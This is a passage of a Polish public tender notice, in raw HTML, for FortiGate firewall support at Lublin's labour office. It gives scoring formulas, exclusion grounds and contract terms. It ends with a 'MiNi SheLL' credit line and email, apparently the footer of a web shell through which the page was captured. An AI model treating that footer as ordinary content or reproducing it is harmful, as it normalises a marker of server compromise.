otrzymanych w kryterium: cena i czas reakcji serwisowej w pełnych godzinach:<br/>O = C + T<br/>gdzie:<br/>O – ocena końcowa<br/>C – punkty w kryterium „cena”<br/>T - punkty w kryterium „czas reakcji serwisowej w pełnych godzinach”<br/><br/>17.2.2. Zamawiający wybierze jako najkorzystniejsza ofertę, która otrzyma najwyższą liczbę punktów w ramach kryterium oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji serwisowej w pełnych godzinach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Roczne wsparcie dla urządzeń Fortigate FG200E o numerach seryjnych:<br/>•	FG200ETK19903011<br/>•	FG200ETK19902867<br/>Aktualizacja dla klastra 2 urządzeń FortiGate FG200E na okres 12 miesięcy od dnia 30.07.2023 obejmująca:<br/>•	Aktualizację oprogramowania systemowego oraz oprogramowania i sygnatur dla modułów antywirusowego, wykrywania i blokowania włamań (IPS), antyspamowego, filtracji stron WWW.<br/>•	Usługi wsparcia telefonicznego lub online świadczone przynajmniej w trybie 8x5 tj. w dni robocze w godzinach pracy Urzędu wraz z dostępem do stron producenta.<br/>•	Gwarancję na urządzenia od dnia 30.07.2023 r. do 29.07.2024<br/><br/>Potwierdzenie aktywności (licencja) dla poszczególnych usług od dat podanych powyżej, powinny być dostarczone Zamawiającemu w formie pisemnej, do miejsca spełnienia świadczenia, którym jest siedziba Zamawiającego, mieszcząca się pod adresem Miejski Urząd Pracy w Lublinie, ul. Niecała 14, 20-080 Lublin, do pomieszczenia wskazanego przez Zamawiającego lub drogą elektroniczną na adres e- mail : admin@mup.lublin.pl, w terminie nie później niż 2 dni przed datą od której dana usługa ma być aktywna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72611000-6 - Usługi w zakresie wsparcia technicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.3. Kryteria oceny ofert dotyczące Części III zamówienia<br/><br/>17.3.1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert: <br/><br/>a)	Kryterium „cena” (C): waga 60%<br/>b)	Kryterium „czas płatności faktury” (T): waga 40%<br/><br/>a) Wartość punktowa kryterium „cena” (C):<br/><br/>C = Cn / Co x 100 pkt x 60%<br/><br/>gdzie:	<br/>	Cn - najniższa ofertowa cena brutto spośród ocenianych ważnych ofert<br/>	Co - cena oferty ocenianej<br/><br/>Wykonawca może otrzymać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Wartość punktowa kryterium „czas płatności faktury” ( T ):<br/><br/>Czas płatności faktury: powyżej 20 dni - 30 dni/	Przyznawane punkty: 40<br/>Czas płatności faktury: 10 – 20 dni	/Przyznawane punkty: 20<br/>Czas płatności faktury: poniżej 10 dni	/Przyznawane punkty: 1<br/><br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40 punktów<br/>Maksymalny czas płatności faktury wynosi 30 dni. <br/>W przypadku zaoferowania czasu płatności faktury dłuższego niż 30 dni oferta Wykonawcy podlegać będzie odrzuceniu jako niezgodna z treścią SWZ.<br/><br/>Ocena końcowa oferty to suma punktów otrzymanych w kryterium: cena i czas płatności faktury:<br/>O = C + T<br/>gdzie:<br/>O – ocena końcowa<br/>C – punkty w kryterium „cena”<br/>T - punkty w kryterium „czas płatności faktury”<br/><br/>17.3.2. Zamawiający wybierze jako najkorzystniejsza ofertę, która otrzyma najwyższą liczbę punktów w ramach kryterium oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu: <br/>a)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa <br/>w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z załącznikiem Nr 3 do niniejszej SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenie o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie w swoim imieniu (każdy podmiot wypełnia i podpisuje odrębny formularz). Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia. <br/>b)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.2.1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Każdy podmiot wypełnia i podpisuje odrębny formularz.<br/><br/>2. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>3. Formularz ofertowy - do wykorzystania wzór (druk), stanowiący Załącznik Nr 4 do SWZ ( przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>W przypadku gdy Wykonawca nie składa ofert na wszystkie części zamówienia, Zamawiający dopuszcza aby Wykonawca w Formularzu ofertowym pominął lub przekreślił treści dotyczące tej części zamówienia, na którą nie składa oferty.<br/>4. Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a)	zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b)	wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c)	jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy. <br/>5. Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>Pozostałe szczegółowe informacje zawarte są w pkt 13. 4 oraz 13.8 do 13.21 SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenie o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie w swoim imieniu (każdy podmiot wypełnia i podpisuje odrębny formularz). Oświadczenia <br/>te potwierdzają brak podstaw wykluczenia. <br/>b)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 8.2.1 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Każdy podmiot wypełnia i podpisuje odrębny formularz.<br/><br/>3. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Działając na podstawie art. 455 ust. 1. Zamawiający przewiduje możliwość zmiany postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z następujących przesłanek:<br/><br/>a)	w przypadku zmian o charakterze prawnym, ekonomicznym, funkcjonalno-organizacyjnym w którejkolwiek ze Stron mających wpływ na realizację przedmiotu Umowy zgodnie z jej postanowieniami w tym na zakres przedmiotu Umowy, termin realizacji Umowy, sposób realizacji Umowy lub wysokość wynagrodzenia przy czym wynagrodzenie może zostać zwiększone maksymalnie o 10% w stosunku do pierwotnie określonego Umową oraz zgodnie ze stawką/stawkami przyjętymi w ofercie Wykonawcy; <br/>b)	w przypadku zmian w powszechnie obowiązujących przepisach prawa w zakresie mającym wpływ na realizację przedmiotu Umowy w ten sposób, że czynią wykonanie Umowy na dotychczasowych zasadach niecelowym, niezgodnym z wymaganiami lub niemożliwym, przy czym zmiany Umowy dokonane mogą być tylko w zakresie niezbędnym do dostosowania umowy do wprowadzonych zmian przepisów prawa;<br/>c)	zmiany wysokości wynagrodzenia w przypadku określonym w § 5 ust. 9-14 Umowy;<br/>d) konieczności zmiany umowy w wyniku okoliczności, o których mowa w § 10 Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-11 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 7.3 Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023r. poz. 129 z późn. zm.), zwana dalej „ustawą o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego” z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy, Zamawiający wyklucza:<br/>1.	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2.	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t.j. Dz. U. z 2022 r. poz. 593 z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>3.	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 z późn. zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 <br/>i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>7.3.1. Wykluczenie następuje na okres trwania okoliczności określonych w pkt 7.3.<br/>7.3.2. W przypadku wykonawcy wykluczonego na podstawie 7.3 Zamawiający odrzuca ofertę takiego wykonawcy.<br/>7.3.3. Kontrola udzielania zamówień publicznych w zakresie zgodności z pkt 7.3 jest wykonywana zgodnie z art. 596 ustawy.<br/>7.3.4. Przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.<br/>7.3.5. Osoba lub podmiot podlegające wykluczeniu na podstawie pkt 7.3, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu <br/>o udzielenie zamówienia publicznego, podlegają karze pieniężnej.<br/>7.3.6. Karę pieniężną, o której mowa w pkt 7.3.5. nakłada Prezes Urzędu Zamówień Publicznych, <br/>w drodze decyzji, w wysokości do 20 000 000 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com